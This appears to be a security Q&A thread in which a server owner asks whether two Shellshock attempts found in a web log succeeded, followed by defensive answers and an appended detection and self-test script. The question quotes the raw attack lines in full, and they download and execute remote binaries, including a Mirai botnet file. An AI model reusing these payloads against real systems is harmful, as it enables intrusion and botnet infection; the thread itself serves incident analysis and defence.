
I am wondering if my server is compromised or not. I just looked at my log and saw the following lines in there:

IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bin/wget http://162.243.117.130/zmuie -O /tmp/zmuie;wget http://162.243.117.130/zmuie -O /dev/shm/zmuie;chmod +x /dev/shm/zmuie /tmp/zmuie;/dev/shm/zmuie;/tmp/zmuie;rm -rf /dev/shm/zmuie /tmp/zmuie*"
IP: 183.90.60.51, Date: 28-12-17, Time:06:13:07, Browser: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'

I am not sure if they were able to execute that command successfully or not. I shut my server off.

  • If you're logging DNS requests anywhere, you could see if this machine tried to resolve any of those domains in the second string. If it attempted resolution, the strings were executed. – Ivan Jan 19 '18 at 20:21
  • Why would it need to resolve the domains if the domain name isn't given? It's a simple IP address. – Bruteforce Jan 21 '18 at 05:33
  • It clearly intends to resolve a domain name in the second command. If successful, wget hxxp://easavi.gq is going to result in a DNS request. – Ivan Jan 22 '18 at 19:34

1 Answer


While one can see from the server log that an exploit was attempted using the Shellshock vulnerability, it is impossible to say based on this log alone whether the exploit was successful.

Your first check should probably be to find out if your system is vulnerable to this kind of exploit at all. This should not be the case if your system has current updates. If your system is vulnerable then you should treat it as compromised, no matter if from the recent exploit attempts or from older attempts, since the bug has been known and exploited for a long time.

Steffen Ullrich
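The two checks discussed above (the answer's "is bash on this host still vulnerable at all?" and Ivan's comment about looking for resolution attempts against the hosts named in the payload) as an added example that is not part of the question or the answer. It is a POSIX shell script: `shellshock_lines` pulls out log lines whose user-agent field starts with the `() {` function-definition prefix that marks a Shellshock attempt, `payload_hosts` lists the hosts those payloads would contact so they can be matched against DNS, proxy or firewall logs, and `is_shellshock_vulnerable` runs the public self-test for the original Shellshock bug against the local `bash`. The log lines in `SAMPLE_LOG` are constructed to mirror the format in the question, with RFC 5737 documentation addresses and a `.invalid` hostname in place of the real ones.

```shell
#!/bin/sh
# Constructed sample log, same layout as the lines in the question
# (IP, Date, Time, Browser). Addresses and hostname are placeholders.
SAMPLE_LOG='IP: 192.0.2.10, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/x http://192.0.2.20/x"
IP: 192.0.2.11, Date: 28-12-17, Time:06:13:07, Browser: Mozilla/5.0 (X11; Linux x86_64)
IP: 192.0.2.12, Date: 28-12-17, Time:06:14:00, Browser: () { :; }; /bin/sh -c '\''wget http://example.invalid/wp-admin?x=y -O /dev/null'\'''

# Print only the log lines (read from stdin) that carry the Shellshock
# signature: a header value beginning with the "() {" function prefix.
shellshock_lines() {
    grep -E '\(\)[[:space:]]*\{'
}

# From stdin, list the distinct hosts referenced by http(s) URLs inside
# Shellshock payloads. These are the names/addresses to look for in your
# DNS, proxy and egress-firewall logs: a resolution or connection attempt
# from the web server is evidence the payload actually ran.
payload_hosts() {
    shellshock_lines \
        | grep -oE "https?://[^/[:space:]\"']+" \
        | sed -E 's#^https?://##' \
        | LC_ALL=C sort -u
}

# Self-test for the original Shellshock bug: an unpatched bash executes
# the trailing command in an environment variable that looks like a
# function export. Returns 0 (true) if vulnerable, 1 if patched or bash
# is not installed. Nothing is modified on the host.
is_shellshock_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 1
    out=$(env x='() { :;}; echo VULNERABLE' bash -c 'echo patched' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Stand-alone run: summarise the sample log and the local bash status.
printf 'Shellshock attempts in sample log: %s\n' \
    "$(printf '%s\n' "$SAMPLE_LOG" | shellshock_lines | grep -c .)"
printf 'Hosts the payloads would contact:\n'
printf '%s\n' "$SAMPLE_LOG" | payload_hosts
if is_shellshock_vulnerable; then
    echo 'Local bash: VULNERABLE to Shellshock - treat this host as compromised'
else
    echo 'Local bash: patched (or bash not present)'
fi
```

To use it on a real log, replace the `SAMPLE_LOG` input with `shellshock_lines < /path/to/access.log` and `payload_hosts < /path/to/access.log`. A patched bash is necessary but not sufficient: it tells you the most recent attempts could not have worked through this vector, not that an earlier one did not, which is why the answer says to treat a vulnerable host as already compromised.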